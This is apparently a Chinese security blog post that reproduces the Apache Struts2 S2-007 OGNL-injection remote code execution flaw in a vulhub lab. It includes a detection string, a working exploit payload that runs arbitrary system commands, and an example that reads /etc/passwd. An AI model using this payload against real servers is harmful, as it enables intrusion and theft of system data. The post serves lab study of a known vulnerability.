S2-007远程代码执行复现


0x01 漏洞简介

S2-007漏洞一般出现在表单处。当配置了验证规则 <ActionName>-validation.xml 时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。

  • 影响版本Struts 2.0.0-2.2.3

0x02 靶场搭建

使用vulhub复现漏洞环境相当方便,Giuhub上下载漏洞环境太慢,建议去码云上下载。

cd vulhub/struts2/s2-007
docker-compose build
docker-compose up -d

0x03 漏洞检测

在年龄age框中输入非数字类型值点击登陆

'+(1+1)+'

年龄age框的值变成 11,证明漏洞存在。

0x04 漏洞利用

直接在年龄age框输入输入要执行的任意代码的EXP,点击登陆提交,页面会返回响应的执行结果。

执行任意命令EXP:

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '

找到EXP中的exec('id')值,将id改为你想要执行的命令即可,例如:exec('cat /etc/passwd')

如果执行结果返回的内容太多,可以通过查看网页源代码进行查看。

参考文章


文章作者: LuckySec
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 LuckySec !
评论
 上一篇
S2-009远程代码执行复现 S2-009远程代码执行复现
S2-009漏洞通过将OGNL表达式放在某个example参数中,然后使用/helloword.acton?example=&(example)('xxx')=1的方法来执行它,从而绕过官方对#、\等特殊字符的防御。
2020-08-20
下一篇 
S2-001远程代码执行复现 S2-001远程代码执行复现
S2-001漏洞是因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。
2020-08-18
  目录